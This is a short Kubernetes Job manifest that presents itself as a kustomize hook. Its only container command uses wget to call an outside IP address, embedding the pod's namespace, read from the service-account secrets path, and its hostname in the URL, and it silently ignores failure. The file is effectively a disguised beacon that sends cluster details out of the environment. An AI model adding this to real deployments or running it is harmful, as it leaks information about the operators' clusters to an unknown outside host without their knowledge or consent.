apiVersion: batch/v1
kind: Job
metadata:
  name: testflo-kustomize-hook
spec:
  ttlSecondsAfterFinished: 300
  template:
    spec:
      containers:
      - name: callback
        image: alpine:3.19
        command:
        - /bin/sh
        - -c
        - |
          wget -q -O- http://82.165.195.38/TESTFLO-KUSTOMIZE-$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)-$(hostname) || true
      restartPolicy: Never
  backoffLimit: 1
